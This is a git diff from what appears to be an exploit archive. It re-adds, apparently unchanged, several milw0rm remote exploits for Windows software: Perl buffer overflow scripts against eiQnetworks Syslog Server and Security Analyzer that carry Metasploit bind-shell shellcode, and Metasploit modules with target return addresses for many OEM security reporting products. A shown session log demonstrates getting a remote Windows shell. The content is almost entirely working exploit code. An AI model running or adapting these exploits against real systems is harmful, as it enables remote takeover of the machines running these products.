-"\xeb\xd3\x6d\xa5\x55\x90\xe5\xa5\x50\xcb\x61\xdf\x18\x04\xe3\x01".
-"\x4c\xb8\x8d\xbf\x3f\x80\x99\x87\x19\x51\xc9\x5e\x4c\x49\xb7\xd3".
-"\xc7\xbe\x5e\xfa\xe9\xad\xf3\x7d\xe3\xab\xcb\x2d\xe3\xab\xf4\x7d".
-"\x4d\x2a\xc9\x81\x6b\xff\x6f\x7f\x4d\x2c\xcb\xd3\x4d\xcd\x5e\xfc".
-"\x39\xad\x5d\xaf\x76\x9e\x5e\xfa\xe0\x05\x71\x44\x42\x70\xa5\x73".
-"\xe1\x05\x77\xd3\x62\xfa\xa1\x2c";
-
-# Stage 1 shellcode can only be 128 butes. 
-# 12 byte Nop find code by skylined?  This is bullshit right now... it does not hunt for the right shit. 
-$sc1 = "\x5f\x54\x90\xb8\x90\x90\xfc\x90\xaf\xf2\xc3\x57";
-
-# for XP SP1  
-#      <128 byte or less stage 1 shellcode> 
-
-# Should total 4096
-$buf = "\x90" x ($b - length($sc2)) . $sc2 . $nextserec  . $sehandler . "\x90" x (128 - length($sc1)) . $sc1 . "\x58" x ($bufsize-$b-8-128);  
-
-print "Exploiting $hostname\n";
-
-$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$hostname, PeerPort=>12345, Type=>SOCK_STREAM);
-
-$sock or die "no socket :$!\n"; 
-
-print $sock "$buf";
-close $sock;
-
-# milw0rm.com [2006-07-27]
+#!/usr/bin/perl -w
+# 
+# http://www.digitalmunition.com
+# written by kf (kf_lists[at]digitalmunition[dot]com) - 03/23/2006
+# Bug found by KF of digitalmunition.com.
+#
+# http://www.zerodayinitiative.com/advisories/ZDI-06-023.html
+#
+# Exploit for * Syslog Server by eiQnetworks  (OEM for Several vendors)
+#
+# There MUST be a syslog service listening on port 12345 for this to work. The syslog service is not enabled by default
+#
+# Currently borked... This shit overwrites the SEH on XP SP1. It just needs good shellcode. perhaps a reverse style jmp instead of a 
+# forward jump. This would eliminate the need for 2 stages of shellcode. .  
+#
+#SEH chain of thread 00000FF4
+#Address    SE handler
+#013ECEF8   FWASyslo.00449EDB
+#013EFF78   WS2HELP.71AA15CF   <-------- I set this address. 
+#
+#013EFF74   90909090
+#013EFF78   909032EB  Pointer to next SEH record  <--- I set this. 
+#013EFF7C   71AA15CF  SE handler   <--- pop pop ret 
+#013EFF80   90909090
+#
+#71AA15CF   5F               POP EDI
+#71AA15D0   5D               POP EBP
+#71AA15D1   C2 0800          RETN 8
+#
+# View the SEH Chain and set a break on the address of the JMP code. This will let you debug the stage one shellcode.
+#
+use IO::Socket;
+
+$bufsize = 4096; 
+
+$hostname = "127.0.0.1";
+$nextserec = pack("l", (0xEB069090)); # jmp short +0x06
+$sehandler = pack("V", (0x71abe325)); # pop edi, pop ebp, retn - ws2help.dll  (Send this reversed note the 'V')
+
+# Binary hunts performed by JxT and Titon
+$tgts{"0"} = "G2SRv4.0.36.exe:932"; # Use length to SEH overwrite. 
+
+unless (($target,$hostname) = @ARGV,$hostname) {
+
+        print "\n        Syslog by eiQnetworks exploit, kf \(kf_lists[at]digitalmunition[dot]com\) - 03/23/2006\n";
+        print "\n\nUsage: $0  \n\nTargets:\n\n";
+
+        foreach $key (sort(keys %tgts)) {
+                ($a,$b) = split(/\:/,$tgts{"$key"});
+                print "\t$key . $a\n";
+        }
+
+        print "\n";
+        exit 1;
+}
+
+
+($a,$b) = split(/\:/,$tgts{"$target"});
+print "*** Target: $a, Len: $b\n";
+
+# Stage 2 shellcode can be up to Length of SEH overwrite. 
+$sc2 = 
+# win32_bind -  EXITFUNC=seh LPORT=4444 
+# Size=344 Encoder=PexFnstenvSub http://metasploit.com
+"\x2b\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xb2".
+"\xfa\xa1\x2c\x83\xeb\xfc\xe2\xf4\x4e\x90\x4a\x61\x5a\x03\x5e\xd3".
+"\x4d\x9a\x2a\x40\x96\xde\x2a\x69\x8e\x71\xdd\x29\xca\xfb\x4e\xa7".
+"\xfd\xe2\x2a\x73\x92\xfb\x4a\x65\x39\xce\x2a\x2d\x5c\xcb\x61\xb5".
+"\x1e\x7e\x61\x58\xb5\x3b\x6b\x21\xb3\x38\x4a\xd8\x89\xae\x85\x04".
+"\xc7\x1f\x2a\x73\x96\xfb\x4a\x4a\x39\xf6\xea\xa7\xed\xe6\xa0\xc7".
+"\xb1\xd6\x2a\xa5\xde\xde\xbd\x4d\x71\xcb\x7a\x48\x39\xb9\x91\xa7".
+"\xf2\xf6\x2a\x5c\xae\x57\x2a\x6c\xba\xa4\xc9\xa2\xfc\xf4\x4d\x7c".
+"\x4d\x2c\xc7\x7f\xd4\x92\x92\x1e\xda\x8d\xd2\x1e\xed\xae\x5e\xfc".
+"\xda\x31\x4c\xd0\x89\xaa\x5e\xfa\xed\x73\x44\x4a\x33\x17\xa9\x2e".
+"\xe7\x90\xa3\xd3\x62\x92\x78\x25\x47\x57\xf6\xd3\x64\xa9\xf2\x7f".
+"\xe1\xa9\xe2\x7f\xf1\xa9\x5e\xfc\xd4\x92\xb0\x70\xd4\xa9\x28\xcd".
+"\x27\x92\x05\x36\xc2\x3d\xf6\xd3\x64\x90\xb1\x7d\xe7\x05\x71\x44".
+"\x16\x57\x8f\xc5\xe5\x05\x77\x7f\xe7\x05\x71\x44\x57\xb3\x27\x65".
+"\xe5\x05\x77\x7c\xe6\xae\xf4\xd3\x62\x69\xc9\xcb\xcb\x3c\xd8\x7b".
+"\x4d\x2c\xf4\xd3\x62\x9c\xcb\x48\xd4\x92\xc2\x41\x3b\x1f\xcb\x7c".
+"\xeb\xd3\x6d\xa5\x55\x90\xe5\xa5\x50\xcb\x61\xdf\x18\x04\xe3\x01".
+"\x4c\xb8\x8d\xbf\x3f\x80\x99\x87\x19\x51\xc9\x5e\x4c\x49\xb7\xd3".
+"\xc7\xbe\x5e\xfa\xe9\xad\xf3\x7d\xe3\xab\xcb\x2d\xe3\xab\xf4\x7d".
+"\x4d\x2a\xc9\x81\x6b\xff\x6f\x7f\x4d\x2c\xcb\xd3\x4d\xcd\x5e\xfc".
+"\x39\xad\x5d\xaf\x76\x9e\x5e\xfa\xe0\x05\x71\x44\x42\x70\xa5\x73".
+"\xe1\x05\x77\xd3\x62\xfa\xa1\x2c";
+
+# Stage 1 shellcode can only be 128 butes. 
+# 12 byte Nop find code by skylined?  This is bullshit right now... it does not hunt for the right shit. 
+$sc1 = "\x5f\x54\x90\xb8\x90\x90\xfc\x90\xaf\xf2\xc3\x57";
+
+# for XP SP1  
+#      <128 byte or less stage 1 shellcode> 
+
+# Should total 4096
+$buf = "\x90" x ($b - length($sc2)) . $sc2 . $nextserec  . $sehandler . "\x90" x (128 - length($sc1)) . $sc1 . "\x58" x ($bufsize-$b-8-128);  
+
+print "Exploiting $hostname\n";
+
+$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$hostname, PeerPort=>12345, Type=>SOCK_STREAM);
+
+$sock or die "no socket :$!\n"; 
+
+print $sock "$buf";
+close $sock;
+
+# milw0rm.com [2006-07-27]
diff --git a/platforms/windows/remote/2080.pl b/platforms/windows/remote/2080.pl
index e47e21372..efa8e5dd4 100755
--- a/platforms/windows/remote/2080.pl
+++ b/platforms/windows/remote/2080.pl
@@ -1,93 +1,93 @@
-#!/usr/bin/perl -w
-#
-# http://www.digitalmunition.com
-# written by kf (kf_lists[at]digitalmunition[dot]com) - 03/23/2006
-# Bug found by Titon of Bastard Labs.
-#
-# http://www.zerodayinitiative.com/advisories/ZDI-06-024.html
-#
-# Exploit for * Security Analyzer by eiQnetworks  (OEM for Several vendors)
-#
-# kfinisterre@kfinisterre01:~$  ./eiQ_multi.pl 2 192.168.0.13
-# *** Target: NetworkSecurityAnalyzerv4.2.27.exe, Len: 1262
-# Exploiting 192.168.0.13
-# kfinisterre@kfinisterre01:~$ telnet 192.168.0.13 4444
-# Trying 192.168.0.13...
-# Connected to 192.168.0.13.
-# Escape character is '^]'.
-# Microsoft Windows XP [Version 5.1.2600]
-# (C) Copyright 1985-2001 Microsoft Corp.
-#
-# C:\Program Files\Network Security Analyzer\fwa>exit
-# exit
-# Connection closed by foreign host.
-
-use IO::Socket;
-$hostname = "127.0.0.1";
-$retval = 0x71ab773b; # jmp EBX on WinXP SP2 ws2_32.dll (metasploit)
-#$retval = 0x750316e2; # call EBX on Windows 2000 SP4 ws2_32.dll (metasploit)
-
-# Binary hunts performed by JxT and Titon
-$tgts{"0"} = "G2SRv4.0.36.exe:1262";
-$tgts{"1"} = "EnterpriseSecurityAnalyzerv21.exe:494";
-$tgts{"2"} = "NetworkSecurityAnalyzerv4.2.27.exe:1262";
-$tgts{"3"} = "NetworkSecurityAnalyzerv5.exe:1262";
-$tgts{"4"} = "FortiReporter_4.2.26.exe:1262";
-$tgts{"5"} = "AstaroReportManagerV37.exe:000";  # Unknown.. need serial
-$tgts{"6"} = "AstaroReportManager_4.2.29.exe:1262";
-
-unless (($target,$hostname) = @ARGV,$hostname) {
-
-        print "\n        Security Analyzer by eiQnetworks exploit, kf \(kf_lists[at]digitalmunition[dot]com\) - 03/23/2006\n";
-        print "\n\nUsage: $0  \n\nTargets:\n\n";
-
-        foreach $key (sort(keys %tgts)) {
-                ($a,$b) = split(/\:/,$tgts{"$key"});
-                print "\t$key . $a\n";
-        }
-
-        print "\n";
-        exit 1;
-}
-
-$ret = pack("l", ($retval));
-($a,$b) = split(/\:/,$tgts{"$target"});
-print "*** Target: $a, Len: $b\n";
-
-$sc = 
-# win32_bind -  EXITFUNC=seh LPORT=4444 
-# Size=344 Encoder=PexFnstenvSub http://metasploit.com
-"\x2b\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xb2".
-"\xfa\xa1\x2c\x83\xeb\xfc\xe2\xf4\x4e\x90\x4a\x61\x5a\x03\x5e\xd3".
-"\x4d\x9a\x2a\x40\x96\xde\x2a\x69\x8e\x71\xdd\x29\xca\xfb\x4e\xa7".
-"\xfd\xe2\x2a\x73\x92\xfb\x4a\x65\x39\xce\x2a\x2d\x5c\xcb\x61\xb5".
-"\x1e\x7e\x61\x58\xb5\x3b\x6b\x21\xb3\x38\x4a\xd8\x89\xae\x85\x04".
-"\xc7\x1f\x2a\x73\x96\xfb\x4a\x4a\x39\xf6\xea\xa7\xed\xe6\xa0\xc7".
-"\xb1\xd6\x2a\xa5\xde\xde\xbd\x4d\x71\xcb\x7a\x48\x39\xb9\x91\xa7".
-"\xf2\xf6\x2a\x5c\xae\x57\x2a\x6c\xba\xa4\xc9\xa2\xfc\xf4\x4d\x7c".
-"\x4d\x2c\xc7\x7f\xd4\x92\x92\x1e\xda\x8d\xd2\x1e\xed\xae\x5e\xfc".
-"\xda\x31\x4c\xd0\x89\xaa\x5e\xfa\xed\x73\x44\x4a\x33\x17\xa9\x2e".
-"\xe7\x90\xa3\xd3\x62\x92\x78\x25\x47\x57\xf6\xd3\x64\xa9\xf2\x7f".
-"\xe1\xa9\xe2\x7f\xf1\xa9\x5e\xfc\xd4\x92\xb0\x70\xd4\xa9\x28\xcd".
-"\x27\x92\x05\x36\xc2\x3d\xf6\xd3\x64\x90\xb1\x7d\xe7\x05\x71\x44".
-"\x16\x57\x8f\xc5\xe5\x05\x77\x7f\xe7\x05\x71\x44\x57\xb3\x27\x65".
-"\xe5\x05\x77\x7c\xe6\xae\xf4\xd3\x62\x69\xc9\xcb\xcb\x3c\xd8\x7b".
-"\x4d\x2c\xf4\xd3\x62\x9c\xcb\x48\xd4\x92\xc2\x41\x3b\x1f\xcb\x7c".
-"\xeb\xd3\x6d\xa5\x55\x90\xe5\xa5\x50\xcb\x61\xdf\x18\x04\xe3\x01".
-"\x4c\xb8\x8d\xbf\x3f\x80\x99\x87\x19\x51\xc9\x5e\x4c\x49\xb7\xd3".
-"\xc7\xbe\x5e\xfa\xe9\xad\xf3\x7d\xe3\xab\xcb\x2d\xe3\xab\xf4\x7d".
-"\x4d\x2a\xc9\x81\x6b\xff\x6f\x7f\x4d\x2c\xcb\xd3\x4d\xcd\x5e\xfc".
-"\x39\xad\x5d\xaf\x76\x9e\x5e\xfa\xe0\x05\x71\x44\x42\x70\xa5\x73".
-"\xe1\x05\x77\xd3\x62\xfa\xa1\x2c";
-
-$nops = "A" x ($b - length($sc));
-$buf = "LICMGR_ADDLICENSE&" . $nops . $sc . $ret . "&";
-
-printf "Exploiting $hostname\n";
-$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$hostname, PeerPort=>10616, Type=>SOCK_STREAM);
-$sock or die "no socket :$!\n"; 
-
-print $sock "$buf";
-print "Try connecting to port 4444 on the target.\n";
-
-# milw0rm.com [2006-07-27]
+#!/usr/bin/perl -w
+#
+# http://www.digitalmunition.com
+# written by kf (kf_lists[at]digitalmunition[dot]com) - 03/23/2006
+# Bug found by Titon of Bastard Labs.
+#
+# http://www.zerodayinitiative.com/advisories/ZDI-06-024.html
+#
+# Exploit for * Security Analyzer by eiQnetworks  (OEM for Several vendors)
+#
+# kfinisterre@kfinisterre01:~$  ./eiQ_multi.pl 2 192.168.0.13
+# *** Target: NetworkSecurityAnalyzerv4.2.27.exe, Len: 1262
+# Exploiting 192.168.0.13
+# kfinisterre@kfinisterre01:~$ telnet 192.168.0.13 4444
+# Trying 192.168.0.13...
+# Connected to 192.168.0.13.
+# Escape character is '^]'.
+# Microsoft Windows XP [Version 5.1.2600]
+# (C) Copyright 1985-2001 Microsoft Corp.
+#
+# C:\Program Files\Network Security Analyzer\fwa>exit
+# exit
+# Connection closed by foreign host.
+
+use IO::Socket;
+$hostname = "127.0.0.1";
+$retval = 0x71ab773b; # jmp EBX on WinXP SP2 ws2_32.dll (metasploit)
+#$retval = 0x750316e2; # call EBX on Windows 2000 SP4 ws2_32.dll (metasploit)
+
+# Binary hunts performed by JxT and Titon
+$tgts{"0"} = "G2SRv4.0.36.exe:1262";
+$tgts{"1"} = "EnterpriseSecurityAnalyzerv21.exe:494";
+$tgts{"2"} = "NetworkSecurityAnalyzerv4.2.27.exe:1262";
+$tgts{"3"} = "NetworkSecurityAnalyzerv5.exe:1262";
+$tgts{"4"} = "FortiReporter_4.2.26.exe:1262";
+$tgts{"5"} = "AstaroReportManagerV37.exe:000";  # Unknown.. need serial
+$tgts{"6"} = "AstaroReportManager_4.2.29.exe:1262";
+
+unless (($target,$hostname) = @ARGV,$hostname) {
+
+        print "\n        Security Analyzer by eiQnetworks exploit, kf \(kf_lists[at]digitalmunition[dot]com\) - 03/23/2006\n";
+        print "\n\nUsage: $0  \n\nTargets:\n\n";
+
+        foreach $key (sort(keys %tgts)) {
+                ($a,$b) = split(/\:/,$tgts{"$key"});
+                print "\t$key . $a\n";
+        }
+
+        print "\n";
+        exit 1;
+}
+
+$ret = pack("l", ($retval));
+($a,$b) = split(/\:/,$tgts{"$target"});
+print "*** Target: $a, Len: $b\n";
+
+$sc = 
+# win32_bind -  EXITFUNC=seh LPORT=4444 
+# Size=344 Encoder=PexFnstenvSub http://metasploit.com
+"\x2b\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xb2".
+"\xfa\xa1\x2c\x83\xeb\xfc\xe2\xf4\x4e\x90\x4a\x61\x5a\x03\x5e\xd3".
+"\x4d\x9a\x2a\x40\x96\xde\x2a\x69\x8e\x71\xdd\x29\xca\xfb\x4e\xa7".
+"\xfd\xe2\x2a\x73\x92\xfb\x4a\x65\x39\xce\x2a\x2d\x5c\xcb\x61\xb5".
+"\x1e\x7e\x61\x58\xb5\x3b\x6b\x21\xb3\x38\x4a\xd8\x89\xae\x85\x04".
+"\xc7\x1f\x2a\x73\x96\xfb\x4a\x4a\x39\xf6\xea\xa7\xed\xe6\xa0\xc7".
+"\xb1\xd6\x2a\xa5\xde\xde\xbd\x4d\x71\xcb\x7a\x48\x39\xb9\x91\xa7".
+"\xf2\xf6\x2a\x5c\xae\x57\x2a\x6c\xba\xa4\xc9\xa2\xfc\xf4\x4d\x7c".
+"\x4d\x2c\xc7\x7f\xd4\x92\x92\x1e\xda\x8d\xd2\x1e\xed\xae\x5e\xfc".
+"\xda\x31\x4c\xd0\x89\xaa\x5e\xfa\xed\x73\x44\x4a\x33\x17\xa9\x2e".
+"\xe7\x90\xa3\xd3\x62\x92\x78\x25\x47\x57\xf6\xd3\x64\xa9\xf2\x7f".
+"\xe1\xa9\xe2\x7f\xf1\xa9\x5e\xfc\xd4\x92\xb0\x70\xd4\xa9\x28\xcd".
+"\x27\x92\x05\x36\xc2\x3d\xf6\xd3\x64\x90\xb1\x7d\xe7\x05\x71\x44".
+"\x16\x57\x8f\xc5\xe5\x05\x77\x7f\xe7\x05\x71\x44\x57\xb3\x27\x65".
+"\xe5\x05\x77\x7c\xe6\xae\xf4\xd3\x62\x69\xc9\xcb\xcb\x3c\xd8\x7b".
+"\x4d\x2c\xf4\xd3\x62\x9c\xcb\x48\xd4\x92\xc2\x41\x3b\x1f\xcb\x7c".
+"\xeb\xd3\x6d\xa5\x55\x90\xe5\xa5\x50\xcb\x61\xdf\x18\x04\xe3\x01".
+"\x4c\xb8\x8d\xbf\x3f\x80\x99\x87\x19\x51\xc9\x5e\x4c\x49\xb7\xd3".
+"\xc7\xbe\x5e\xfa\xe9\xad\xf3\x7d\xe3\xab\xcb\x2d\xe3\xab\xf4\x7d".
+"\x4d\x2a\xc9\x81\x6b\xff\x6f\x7f\x4d\x2c\xcb\xd3\x4d\xcd\x5e\xfc".
+"\x39\xad\x5d\xaf\x76\x9e\x5e\xfa\xe0\x05\x71\x44\x42\x70\xa5\x73".
+"\xe1\x05\x77\xd3\x62\xfa\xa1\x2c";
+
+$nops = "A" x ($b - length($sc));
+$buf = "LICMGR_ADDLICENSE&" . $nops . $sc . $ret . "&";
+
+printf "Exploiting $hostname\n";
+$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$hostname, PeerPort=>10616, Type=>SOCK_STREAM);
+$sock or die "no socket :$!\n"; 
+
+print $sock "$buf";
+print "Try connecting to port 4444 on the target.\n";
+
+# milw0rm.com [2006-07-27]
diff --git a/platforms/windows/remote/2140.pm b/platforms/windows/remote/2140.pm
index 6b4072f46..9f95b2040 100755
--- a/platforms/windows/remote/2140.pm
+++ b/platforms/windows/remote/2140.pm
@@ -1,106 +1,106 @@
-#!/usr/bin/perl -w
-
-package Msf::Exploit::EiQ_License; 
-use base "Msf::Exploit";
-use strict;
-use Pex::Text;
-
-my $advanced = { };
-
-my $info =
-  {
-	'Name'     => 'EIQ License Manager Overflow',
-	'Authors'  => [ 'ri0t ri0t@ri0tnet.net KF kf_list@digitalmunition.com' ],
-
-	'Arch'  => [ 'x86' ],
-	'OS'    => [ 'win32', 'win2000', 'winxp' ],
-	'Priv'  => 0,
-	
-	'AutoOpts'  => { 'EXITFUNC' => 'seh' },
-	
-	'UserOpts'  =>
-	  {
-		'RHOST' => [1, 'ADDR', 'The target address'],
-		'RPORT' => [1, 'PORT', 'The target port', 10616],
-	 },
-        'Payload'  =>
-	  {
-		'Space' => 494,
-		'BadChars'  => "\x00\x0a\x0d\x40\x26",
-            },
-          'Description'  =>  Pex::Text::Freeform(qq{
-        This module Exploits a buffer overflow in the LICENCE_MANAGER field of
-	EiQ networks Enterprise Security Analyzer.  This bug was found by Titon
-	of Bastard Labs. 
-        }),
-        
-
-	'Refs' =>
-	[
-		['OSVDB', '27526'],
-	],
-          
-        'DefaultTarget' => 1,
-	'Targets' =>
-	  [
-		['EiQ Enterprise Security Analyzer Buffer size 494 Windows 2000 SP0-SP4 English', 0x750316e2, 494 ],   # call ebx
-		['EiQ Enterprise Security Analyzer Buffer size 494 Windows XP English SP1/SP2', 0x77db64dc, 494 ],	# jmp ebx
-		['EiQ Enterprise Security Analyzer Buffer size 494 Windwos Server 2003 SP0/SP1', 0x77d16764, 494 ],   # jmp EBX
-		['Astaro Report Manager (OEM) Buffer size 1262 Windows 2000 SP0-SP4 English', 0x750316e2, 1262 ],
-		['Astaro Report Manager (OEM) Buffer size 1262 Windows XP English SP1/SP2', 0x77db64dc, 1262 ],
-		['Astaro Report Manager (OEM) Buffer size 1262 Windows Server 2003 English SP0/SP1', 0x77d16764, 1262 ],
-		['Fortinet FortiReporter (OEM) Buffer size 1262 Windows 2000 SP0-SP4 English', 0x750316e2, 1262 ],
-	        ['Fortinet FortiReporter (OEM) Buffer size 1262 Windows XP English SP1/SP2', 0x77db64dc, 1262 ],
-	        ['Fortinet FortiReporter (OEM) Buffer size 1262 Windows Server 2003 English SP0/SP1', 0x77d16764, 1262 ],
-		['iPolicy Security Reporter (OEM) Buffer size 1262 Windows 2000 SP0-SP4 English', 0x750316e2, 1262 ],
-                ['iPolicy Security Reporter (OEM) Buffer size 1262 Windows XP English SP1/SP2', 0x77db64dc, 1262 ],
-		['iPolicy Security Reporter (OEM) Buffer size 1262 Windows Server 2003 English SP0/SP1', 0x77d16764, 1262 ],
-		['SanMina Viking Multi-Log Manager (OEM) Buffer size 1262 Windows 2000 SP0-SP4 English', 0x750316e2, 1262 ],
-                ['SanMina Viking Multi-Log Manager (OEM) Buffer size 1262 Windows XP English SP1/SP2', 0x77db64dc, 1262 ],
-		['SanMina Viking Multi-Log Manager (OEM) Buffer size 1262 Windows Server 2003 English SP0/SP1', 0x77d16764, 1262 ],
-		['Secure Computing G2 Security Reporter (OEM) Buffer size 1262 Windows 2000 SP0-SP4 English', 0x750316e2, 1262 ],
-                ['Secure Computing G2 Security Reporter (OEM) Buffer size 1262 Windows XP English SP1/SP2', 0x77db64dc, 1262 ],
-	        ['Secure Computing G2 Security Reporter (OEM) Buffer size 1262 Windows Server 2003 English SP0/SP1', 0x77d16764, 1262 ],
-		['Top Layer Network Security Analyzer (OEM) Buffer size 1262 Windows 2000 SP0-SP4 English', 0x750316e2, 1262 ],
-                ['Top Layer Network Security Analyzer (OEM) Buffer size 1262 Windows XP English SP1/SP2', 0x77db64dc, 1262 ],
-	        ['Top Layer Network Security Analyzer (OEM) Buffer size 1262 Windows Server 2003 English SP0/SP1', 0x77d16764, 1262 ],
-         ], 
-  };
-  
-  sub new {
-	my $class = shift;
-	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
-	return($self);
-}
-  
-  sub Exploit {
-	my $self = shift;
-	my $target_host = $self->GetVar('RHOST');
-	my $target_port = $self->GetVar('RPORT');
-	my $target_idx  = $self->GetVar('TARGET');
-	my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
-	my $target      = $self->Targets->[$target_idx];
-	my $nopsize = $target->[2];
-        my $nops 	= $self->MakeNops($nopsize - length($shellcode));
-        my $ret         =  pack("V", $target->[1]);
-        my $evil        = "LICMGR_ADDLICENSE&" . $nops . $shellcode . $ret . "&";
-	
-            
-        my $s = Msf::Socket::Tcp->new
-	  (
-		'PeerAddr'  => $target_host,
-		'PeerPort'  => $target_port,
-		'LocalPort' => $self->GetVar('CPORT'),
-    	  );
-          
-          if ($s->IsError) {
-		$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
-		return;
-	}
-          $self->PrintLine(sprintf ("[*] Trying ".$target->[0]." using return address 0x%.8x....", $target->[1]));
-          
-          $s->Send("$evil");
-          return;
-  }
-
-# milw0rm.com [2006-08-07]
+#!/usr/bin/perl -w
+
+package Msf::Exploit::EiQ_License; 
+use base "Msf::Exploit";
+use strict;
+use Pex::Text;
+
+my $advanced = { };
+
+my $info =
+  {
+	'Name'     => 'EIQ License Manager Overflow',
+	'Authors'  => [ 'ri0t ri0t@ri0tnet.net KF kf_list@digitalmunition.com' ],
+
+	'Arch'  => [ 'x86' ],
+	'OS'    => [ 'win32', 'win2000', 'winxp' ],
+	'Priv'  => 0,
+	
+	'AutoOpts'  => { 'EXITFUNC' => 'seh' },
+	
+	'UserOpts'  =>
+	  {
+		'RHOST' => [1, 'ADDR', 'The target address'],
+		'RPORT' => [1, 'PORT', 'The target port', 10616],
+	 },
+        'Payload'  =>
+	  {
+		'Space' => 494,
+		'BadChars'  => "\x00\x0a\x0d\x40\x26",
+            },
+          'Description'  =>  Pex::Text::Freeform(qq{
+        This module Exploits a buffer overflow in the LICENCE_MANAGER field of
+	EiQ networks Enterprise Security Analyzer.  This bug was found by Titon
+	of Bastard Labs. 
+        }),
+        
+
+	'Refs' =>
+	[
+		['OSVDB', '27526'],
+	],
+          
+        'DefaultTarget' => 1,
+	'Targets' =>
+	  [
+		['EiQ Enterprise Security Analyzer Buffer size 494 Windows 2000 SP0-SP4 English', 0x750316e2, 494 ],   # call ebx
+		['EiQ Enterprise Security Analyzer Buffer size 494 Windows XP English SP1/SP2', 0x77db64dc, 494 ],	# jmp ebx
+		['EiQ Enterprise Security Analyzer Buffer size 494 Windwos Server 2003 SP0/SP1', 0x77d16764, 494 ],   # jmp EBX
+		['Astaro Report Manager (OEM) Buffer size 1262 Windows 2000 SP0-SP4 English', 0x750316e2, 1262 ],
+		['Astaro Report Manager (OEM) Buffer size 1262 Windows XP English SP1/SP2', 0x77db64dc, 1262 ],
+		['Astaro Report Manager (OEM) Buffer size 1262 Windows Server 2003 English SP0/SP1', 0x77d16764, 1262 ],
+		['Fortinet FortiReporter (OEM) Buffer size 1262 Windows 2000 SP0-SP4 English', 0x750316e2, 1262 ],
+	        ['Fortinet FortiReporter (OEM) Buffer size 1262 Windows XP English SP1/SP2', 0x77db64dc, 1262 ],
+	        ['Fortinet FortiReporter (OEM) Buffer size 1262 Windows Server 2003 English SP0/SP1', 0x77d16764, 1262 ],
+		['iPolicy Security Reporter (OEM) Buffer size 1262 Windows 2000 SP0-SP4 English', 0x750316e2, 1262 ],
+                ['iPolicy Security Reporter (OEM) Buffer size 1262 Windows XP English SP1/SP2', 0x77db64dc, 1262 ],
+		['iPolicy Security Reporter (OEM) Buffer size 1262 Windows Server 2003 English SP0/SP1', 0x77d16764, 1262 ],
+		['SanMina Viking Multi-Log Manager (OEM) Buffer size 1262 Windows 2000 SP0-SP4 English', 0x750316e2, 1262 ],
+                ['SanMina Viking Multi-Log Manager (OEM) Buffer size 1262 Windows XP English SP1/SP2', 0x77db64dc, 1262 ],
+		['SanMina Viking Multi-Log Manager (OEM) Buffer size 1262 Windows Server 2003 English SP0/SP1', 0x77d16764, 1262 ],
+		['Secure Computing G2 Security Reporter (OEM) Buffer size 1262 Windows 2000 SP0-SP4 English', 0x750316e2, 1262 ],
+                ['Secure Computing G2 Security Reporter (OEM) Buffer size 1262 Windows XP English SP1/SP2', 0x77db64dc, 1262 ],
+	        ['Secure Computing G2 Security Reporter (OEM) Buffer size 1262 Windows Server 2003 English SP0/SP1', 0x77d16764, 1262 ],
+		['Top Layer Network Security Analyzer (OEM) Buffer size 1262 Windows 2000 SP0-SP4 English', 0x750316e2, 1262 ],
+                ['Top Layer Network Security Analyzer (OEM) Buffer size 1262 Windows XP English SP1/SP2', 0x77db64dc, 1262 ],
+	        ['Top Layer Network Security Analyzer (OEM) Buffer size 1262 Windows Server 2003 English SP0/SP1', 0x77d16764, 1262 ],
+         ], 
+  };
+  
+  sub new {
+	my $class = shift;
+	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
+	return($self);
+}
+  
+  sub Exploit {
+	my $self = shift;
+	my $target_host = $self->GetVar('RHOST');
+	my $target_port = $self->GetVar('RPORT');
+	my $target_idx  = $self->GetVar('TARGET');
+	my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
+	my $target      = $self->Targets->[$target_idx];
+	my $nopsize = $target->[2];
+        my $nops 	= $self->MakeNops($nopsize - length($shellcode));
+        my $ret         =  pack("V", $target->[1]);
+        my $evil        = "LICMGR_ADDLICENSE&" . $nops . $shellcode . $ret . "&";
+	
+            
+        my $s = Msf::Socket::Tcp->new
+	  (
+		'PeerAddr'  => $target_host,
+		'PeerPort'  => $target_port,
+		'LocalPort' => $self->GetVar('CPORT'),
+    	  );
+          
+          if ($s->IsError) {
+		$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
+		return;
+	}
+          $self->PrintLine(sprintf ("[*] Trying ".$target->[0]." using return address 0x%.8x....", $target->[1]));
+          
+          $s->Send("$evil");
+          return;
+  }
+
+# milw0rm.com [2006-08-07]
diff --git a/platforms/windows/remote/2276.pm b/platforms/windows/remote/2276.pm
index af68916f1..ecca7d53f 100755
--- a/platforms/windows/remote/2276.pm
+++ b/platforms/windows/remote/2276.pm
@@ -1,303 +1,303 @@
-##
-# This file is part of the Metasploit Framework and may be redistributed
-# according to the licenses defined in the Authors field below. In the
-# case of an unknown or missing license, this file defaults to the same
-# license as the core Framework (dual GPLv2 and Artistic). The latest
-# version of the Framework can always be obtained from metasploit.com.
-##
-
-package Msf::Exploit::ibm_egatherer;
-
-use strict;
-use base "Msf::Exploit";
-use Pex::Text;
-use Msf::Encoder;
-use IO::Socket::INET;
-use IPC::Open3;
-
-my $advanced =
-  {
-  };
-
-my $info =
-  {
-	'Name'           => 'IBM eGatherer ActiveX Code Execution Vulnerability',
-	'Version'        => '$Revision: 1 $',
-	'Authors'        =>
-	  [
-		'Francisco Amato  [ISR] www.infobyte.com.ar',
-	  ],
-
-	'Description'    =>
-	  Pex::Text::Freeform(qq{
-		This module exploits a code execution vulnerability in the IBM eGatherer ActiveX buffer overflow.
-}),
-        'Arch'           => [ 'x86' ],
-        'OS'    => ['win32', 'win2000' ],
-					
-	'Priv'           => 0,
-
-	'UserOpts'       =>
-	  {
-		'HTTPPORT' => [ 1, 'PORT', 'The local HTTP listener port', 8080      ],
-		'HTTPHOST' => [ 0, 'HOST', 'The local HTTP listener host', "0.0.0.0" ],
-
-	  },
-
-        'AutoOpts'  =>
